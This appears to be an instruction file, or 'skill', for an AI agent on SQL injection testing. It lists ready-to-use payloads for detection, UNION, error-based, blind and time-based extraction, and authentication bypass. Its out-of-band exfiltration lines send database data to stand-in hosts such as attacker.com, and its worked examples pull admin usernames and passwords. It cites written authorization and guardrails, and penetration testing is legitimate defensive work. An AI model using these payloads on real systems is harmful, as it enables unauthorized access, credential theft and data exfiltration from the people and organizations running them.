This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". It provides comprehensive techniques for identifying, exploiting, and understanding SQL injection attack vectors across different database systems.
Execute comprehensive SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and validate input sanitization mechanisms. This skill enables systematic detection and exploitation of SQL injection vulnerabilities across in-band, blind, and out-of-band attack vectors to assess application security posture.
Inputs / Prerequisites
Required Access
Target web application URL with injectable parameters
Burp Suite or equivalent proxy tool for request manipulation
SQLMap installation for automated exploitation
Browser with developer tools enabled
Technical Requirements
Understanding of SQL query syntax (MySQL, MSSQL, PostgreSQL, Oracle)
Knowledge of HTTP request/response cycle
Familiarity with database schemas and structures
Write permissions for testing reports
Legal Prerequisites
Written authorization for penetration testing
Defined scope including target URLs and parameters
Emergency contact procedures established
Data handling agreements in place
Outputs / Deliverables
Primary Outputs
SQL injection vulnerability report with severity ratings
Insert special characters to trigger error responses:
-- Single quote test
'
-- Double quote test
"
-- Comment sequences
--
#
/**/
-- Semicolon for query stacking
;
-- Parentheses
)
Monitor application responses for:
Database error messages revealing query structure
Unexpected application behavior changes
HTTP 500 Internal Server errors
Modified response content or length
Logic Testing Payloads
Verify boolean-based vulnerability presence:
-- True condition tests
page.asp?id=1 or 1=1
page.asp?id=1' or 1=1--
page.asp?id=1" or 1=1--
-- False condition tests
page.asp?id=1 and 1=2
page.asp?id=1' and 1=2--
Compare responses between true and false conditions to confirm injection capability.
Phase 2: Exploitation Techniques
UNION-Based Extraction
Combine attacker-controlled SELECT statements with original query:
-- Determine column count
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
-- Continue until error occurs
-- Find displayable columns
UNION SELECT NULL,NULL,NULL--
UNION SELECT 'a',NULL,NULL--
UNION SELECT NULL,'a',NULL--
-- Extract data
UNION SELECT username,password,NULL FROM users--
UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
Error-Based Extraction
Force database errors that leak information:
-- MSSQL version extraction
1' AND 1=CONVERT(int,(SELECT @@version))--
-- MySQL extraction via XPATH
1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--
-- PostgreSQL cast errors
1' AND 1=CAST((SELECT version()) AS int)--
Blind Boolean-Based Extraction
Infer data through application behavior changes:
-- Character extraction
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--
-- Conditional responses
1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--
Time-Based Blind Extraction
Use database sleep functions for confirmation:
-- MySQL
1' AND IF(1=1,SLEEP(5),0)--
1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--
-- MSSQL
1'; WAITFOR DELAY '0:0:5'--
-- PostgreSQL
1'; SELECT pg_sleep(5)--
Out-of-Band (OOB) Extraction
Exfiltrate data through external channels:
-- MSSQL DNS exfiltration
1; EXEC master..xp_dirtree '\\attacker-server.com\share'--
-- MySQL DNS exfiltration
1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--
-- Oracle HTTP request
1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--
Phase 3: Authentication Bypass
Login Form Exploitation
Craft payloads to bypass credential verification:
-- Classic bypass
admin'--
admin'/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
') OR ('1'='1
') OR ('1'='1'--
-- Username enumeration
admin' AND '1'='1
admin' AND '1'='2
Query transformation example:
-- Original query
SELECT * FROM users WHERE username='input' AND password='input'
-- Injected (username: admin'--)
SELECT * FROM users WHERE username='admin'--' AND password='anything'
-- Password check bypassed via comment
1. Insert ' β Check for error
2. Insert " β Check for error
3. Try: OR 1=1-- β Check for behavior change
4. Try: AND 1=2-- β Check for behavior change
5. Try: ' WAITFOR DELAY '0:0:5'-- β Check for delay
Database Fingerprinting
-- MySQL
SELECT @@version
SELECT version()
-- MSSQL
SELECT @@version
SELECT @@servername
-- PostgreSQL
SELECT version()
-- Oracle
SELECT banner FROM v$version
SELECT * FROM v$version
Information Schema Queries
-- MySQL/MSSQL table enumeration
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
-- Column enumeration
SELECT column_name FROM information_schema.columns WHERE table_name='users'
-- Oracle equivalent
SELECT table_name FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'
Common Payloads Quick List
Purpose
Payload
Basic test
' or "
Boolean true
OR 1=1--
Boolean false
AND 1=2--
Comment (MySQL)
# or --
Comment (MSSQL)
--
UNION probe
UNION SELECT NULL--
Time delay
AND SLEEP(5)--
Auth bypass
' OR '1'='1
Constraints and Guardrails
Operational Boundaries
Never execute destructive queries (DROP, DELETE, TRUNCATE) without explicit authorization
Limit data extraction to proof-of-concept quantities
Avoid denial-of-service through resource-intensive queries
Stop immediately upon detecting production database with real user data
Technical Limitations
WAF/IPS may block common payloads requiring evasion techniques
Parameterized queries prevent standard injection
Some blind injection requires extensive requests (rate limiting concerns)
Second-order injection requires understanding of data flow
Legal and Ethical Requirements
Written scope agreement must exist before testing
Document all extracted data and handle per data protection requirements
Report critical vulnerabilities immediately through agreed channels
Never access data beyond scope requirements
Examples
Example 1: E-commerce Product Page SQLi
Scenario: Testing product display page with ID parameter
Initial Request:
GET /product.php?id=5 HTTP/1.1
Detection Test:
GET /product.php?id=5' HTTP/1.1
Response: MySQL error - syntax error near '''
Column Enumeration:
GET /product.php?id=5 ORDER BY 4-- HTTP/1.1
Response: Normal
GET /product.php?id=5 ORDER BY 5-- HTTP/1.1
Response: Error (4 columns confirmed)
Data Extraction:
GET /product.php?id=-5 UNION SELECT 1,username,password,4 FROM admin_users-- HTTP/1.1
Response: Displays admin credentials
Example 2: Blind Time-Based Extraction
Scenario: No visible output, testing for blind injection
Confirm Vulnerability:
id=5' AND SLEEP(5)--
-- Response delayed by 5 seconds (vulnerable confirmed)
Extract Database Name Length:
id=5' AND IF(LENGTH(database())=8,SLEEP(5),0)--
-- Delay confirms database name is 8 characters
Extract Characters:
id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
-- Iterate through characters to extract: 'appstore'
Example 3: Login Bypass
Target: Admin login form
Standard Login Query:
SELECT * FROM users WHERE username='[input]' AND password='[input]'
Injection Payload:
Username: administrator'--
Password: anything
Resulting Query:
SELECT * FROM users WHERE username='administrator'--' AND password='anything'
Result: Password check bypassed, authenticated as administrator.
Troubleshooting
No Error Messages Displayed
Application uses generic error handling
Switch to blind injection techniques (boolean or time-based)
Monitor response length differences instead of content
UNION Injection Fails
Column count may be incorrect β Test with ORDER BY
Data types may mismatch β Use NULL for all columns first
Results may not display β Find injectable column positions
